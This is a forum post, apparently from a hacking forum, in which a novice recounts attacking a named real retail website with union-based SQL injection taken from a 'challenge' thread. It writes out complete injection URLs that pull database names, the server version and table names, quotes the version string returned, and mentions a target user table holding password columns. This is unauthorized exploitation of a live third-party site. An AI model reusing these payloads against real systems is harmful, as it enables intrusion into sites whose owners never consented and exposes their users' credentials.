@ Berry White and JaNuS18 - Okay thanks. Sorry about not posting the databa

1. @ Berry White and JaNuS18 - Okay thanks. Sorry about not posting the database name command that I used - the combination of my head getting buggy & the fact that I cannot yet post links caused me to make the OP too short...
2.  
3.  
4.  
5. The SQLi challenge that I was messing around with, trying to get my foot in the door (experience-wise at SQLi) can be found on the HF site. It's the thread called ("Challenge Number 001 - Easy", by by pishicat_Injector). It can be found, by anyone who wants to see it, at: > Hack Forums home page > Hacks, Exploits, and Various Discussions > Website and Forum Hacking > SQL Injection Attacks > about the 19th+ thread down. The original target URL is "fridaynighthair.com/products_show.asp?productid=685".
6.  
7.  
8. At first, I was just noodling around not really knowing what I was doing, just trying to see if I could get the hang of doing his first task & rule (Union Based && GET Method). But then, during a frustration break, I started looking around the HF site and found the ebook "Advanced SQL injection just became easier"... So, I started to follow that ebook and actually started to get somewhere with SQLi and his target URL...
9.  
10.  
11.  
12.  
13. The command string (unparaphrased) that I used to get the database name was: "fridaynighthair.com/products_show.asp?productid=-685 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(schema_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66 from information_schema.schemata--" Once all of that is injected into the URL bar and then [enter], I notice an output string on the page that was not there before... It appears at the top of the right sidebar of the page... It's white text with an orange background, and says "Put me on the waiting list". However, I'd think that's a strange name for a database, and it's also a link, so it may not be the database name.
14.  
15.  
16.  
17.  
18. The command string (unparaphrased) that I used to get the SQL version was: "fridaynighthair.com/products_show.asp?productid=-685 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,@@version,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--". It outputs, "Microsoft SQL Server 2012 - 11.0.5556.0 (X64) Oct 31 2014 16:50:24 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1)".
19.  
20.  
21.  
22.  
23. ...
24.  
25.  
26.  
27.  
28. Then, the command string (unparaphrased) that I use to try and get the table names is: "fridaynighthair.com/products_show.asp?productid=-685 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(table_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66 FROM information_schema.tables WHERE table_schema=database()--".
29.  
30.  
31.  
32.  
33. ... At first, I thought the 8 table names were the bolded words that appear on the left side bar (In Stock Products, Custom Products, Lace Wigs Information, Repair Services, Store Information, Wig Care Tips, Wholesale Program, and Store Policies.), but now I don't think so, because they also appear there when only the target URL is entered. That, and when I looked back at pishicat_Injector's challenge thread ("Challenge Number 001 - Easy"), he includes a proof in the form of a pic that reads:
34.  
35. "Table: user", "Columns: UserID : UserName : UserEmail :", "Article: UserPassword : sign : sex : homepage :", and "addDate: logins :" ... and then the group of info below that is; "Table: xr_songhuo", "Columns: songid : subject : jsmoney : fangshi :", and "songidorder: py1 : py2 : py3 :".
36.  
37.  
38. ... But now, I'm pretty sure that I either messed up while I was trying to get the table names, or I just didn't notice the table names when I did it, because none of my terms that I thought were table names match any of his terms (unless I'm just reading his pic wrong). One thing that I didn't do, but I think I vaguely remember reading about, was take a look at the HTML source code (view source) to see if any table names might have appeared there.
39.  
40.  
41.  
42.  
43. If I find that there are 7 vulnerable columns in a database, does that mean that those same 7 columns are vulnerable throughout all of the tables (if there are multiple tables)? In other words, I currently also find myself wondering about the structure of the database(s)... For instance, I used to think that on the top level, there might be only 1 database or multiple databases?.. And then each one of those databases might have only 1 or multiple tables?.. And the way that I thought of the layout of the tables in each database was that they were stacked on top of eachother (like a spreadsheet file, with maybe multiple dividers separating each table)?..
44.  
45. But now I'm not so sure that view of it all holds water?.. Maybe, it is the way that the databases and tables are originally created?..